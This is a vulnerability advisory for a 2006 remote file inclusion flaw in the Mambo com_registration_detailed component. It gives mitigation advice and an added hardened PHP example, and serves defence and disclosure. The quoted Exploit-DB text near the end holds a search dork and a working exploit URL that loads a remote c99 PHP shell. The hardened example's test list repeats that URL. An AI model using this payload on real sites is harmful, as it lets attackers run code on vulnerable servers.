Vendor: Mambo com_registration_detailed
By: k1tk4t
CVSS: 9.3 (HIGH)
Type: Remote File Inclusion
CWE: 98
Product Name: Mambo com_registration_detailed
Affected Version From: 4.1 and below
Affected Version To: N/A
Patch Exists: Yes
Related CWE: N/A
CPE: a:mambo:mambo_com_registration_detailed
Metasploit: N/A
Other Scripts: N/A
Tags: N/A
CVSS Metrics: N/A
Nuclei References: N/A
Nuclei Metadata: N/A
Platforms Tested: N/A
Year: 2006

Mambo com_registration_detailed <= 4.1 Remote File Inclusion

Mambo com_registration_detailed version 4.1 and below is vulnerable to Remote File Inclusion. Line 25 of 'registration_detailed.inc.php' builds an include path from two variables that the script never initialises, '$mosConfig_absolute_path' and '$_REGISTER_DETAILS_LANGUAGE', and passes the result to include_once(). When the file is requested directly, rather than through Mambo's index.php, and PHP's register_globals is enabled, both variables are populated from the query string; if remote includes are permitted (allow_url_fopen, and on PHP 5.2 and later also allow_url_include), an attacker can set 'mosConfig_absolute_path' to a URL pointing at a PHP file they control and have that code executed on the server. The published exploit ends the URL with '?' so that the rest of the concatenated path reaches the attacker's host as a query string instead of being appended to the file name.

Mitigation:

The vendor has released a patch to address this vulnerability; upgrade to the latest version of the component. Independently of the patch, set register_globals = Off and allow_url_fopen / allow_url_include = Off in php.ini, and make sure component include files cannot be executed by direct request (Mambo's convention is a defined('_VALID_MOS') or die(...) guard at the top of each file). Note that disabling remote includes alone only downgrades the issue: with register_globals still on, 'mosConfig_absolute_path' remains attacker-controlled and the same line can be used to include arbitrary local files.
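The include line quoted in the advisory next to a hardened form, as an added example; this is not code from the com_registration_detailed component or from Mambo. It relies on Mambo's '_VALID_MOS' constant, which the core index.php defines before loading a component; 'require_mambo_context', 'hardened_language_file' and the language allow-list are names and values made up for this example, and the directory tree it checks against is constructed in a temporary directory so the script runs stand-alone.

```php
<?php
// Added example, not code from the com_registration_detailed component or from Mambo.
// It places the include pattern quoted in the advisory next to a hardened form.
// require_mambo_context(), hardened_language_file() and the language allow-list are
// illustrative names and values chosen for this example.

// Vulnerable pattern: the path is built from two variables the script never sets.
// Requested directly with register_globals=On, PHP fills both from the query string;
// with remote includes allowed, a URL in $mosConfig_absolute_path is fetched and executed.
//   include_once("$mosConfig_absolute_path/components/com_extended_registration/language/$_REGISTER_DETAILS_LANGUAGE.inc.php");

// Hardening step 1: refuse direct requests. Mambo's index.php defines _VALID_MOS
// before loading a component, so a file reached by URL alone never has it.
function require_mambo_context() {
    if (!defined('_VALID_MOS')) {
        header('HTTP/1.0 403 Forbidden');
        exit('Direct Access to this location is not allowed.');
    }
}

// Hardening step 2: the base path comes from the site configuration, never from the
// request, and the language selector must match a fixed allow-list. A realpath()
// containment check is the final guard against traversal and stream wrappers.
// Returns the resolved file path, or null when the input is rejected.
function hardened_language_file($absolute_path, $requested_language) {
    $allowed = array('english', 'german', 'indonesian'); // illustrative allow-list
    if (!in_array($requested_language, $allowed, true)) {
        return null; // anything not on the list, including URLs and '../', stops here
    }

    $dir  = realpath($absolute_path . '/components/com_extended_registration/language');
    $file = realpath($absolute_path . '/components/com_extended_registration/language/' . $requested_language . '.inc.php');
    if ($dir === false || $file === false) {
        return null; // language file missing
    }
    if (strpos($file, $dir . DIRECTORY_SEPARATOR) !== 0) {
        return null; // resolved outside the language directory
    }
    return $file;
}

// Demonstration against a throw-away directory tree (constructed here, not a real site).
$site    = sys_get_temp_dir() . '/mambo_demo_' . getmypid();
$langdir = $site . '/components/com_extended_registration/language';
mkdir($langdir, 0700, true);
file_put_contents($langdir . '/english.inc.php', "<?php \$_LANG_DEMO = 'english loaded';\n");

define('_VALID_MOS', 1);   // what index.php does; simulated so this script can run
require_mambo_context();

$tests = array(
    'english'                  => 'on the allow-list, resolves to english.inc.php',
    'http://phpshell/c99.txt?' => 'the advisory payload, rejected by the allow-list',
    '../../../../etc/passwd'   => 'traversal attempt, rejected by the allow-list',
);
foreach ($tests as $input => $why) {
    $resolved = hardened_language_file($site, $input);
    printf("%-28s -> %s (%s)\n", var_export($input, true),
           $resolved === null ? 'REJECTED' : basename($resolved), $why);
}

// Only the resolved, checked path is ever handed to include_once().
$file = hardened_language_file($site, 'english');
include_once($file);
echo $_LANG_DEMO, "\n";

// Clean up the demo tree.
unlink($langdir . '/english.inc.php');
rmdir($langdir);
rmdir($site . '/components/com_extended_registration');
rmdir($site . '/components');
rmdir($site);
```

Run with `php` from the command line; the first test line resolves to english.inc.php and the other two print REJECTED. In a real component the guard is the first statement of the file and '$mosConfig_absolute_path' comes from configuration.php, so nothing in the include path is ever taken from the request.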

Exploit-DB raw data:

    ########################################################################
    # Mambo com_registration_detailed <= 4.1 Remote File Inclusion
    #  
    # Download Source  : http://mamboxchange.com/projects/regdetailed/
    # Dork =  allinurl:com_extended_registration
    #
    # Found By: k1tk4t - k1tk4t[d0t]h4ck[4t]gmail[d0t]com
    # Location: Indonesia

    ########################################################################
    file ;
    registration_detailed.inc.php
    ########################################################################
    bugs ;
    [at]line 25

    include_once("$mosConfig_absolute_path/components/com_extended_registration/language/$_REGISTER_DETAILS_LANGUAGE.inc.php");
    #########################################################################
    example exploit ;
    http://victim.xxx/components/com_extended_registration/registration_detailed.inc.php?mosConfig_absolute_path=http://phpshell/c99.txt?
    ########################################################################
    Thanks;
    str0ke
    milw0rm
    google
    #e-c-h-o (all member echo community)
    #nyubi (all member solpotcrew community)
    --> ghoz, home_edition2001, iFX, and for all (friend's&enemy)

# milw0rm.com [2006-09-16]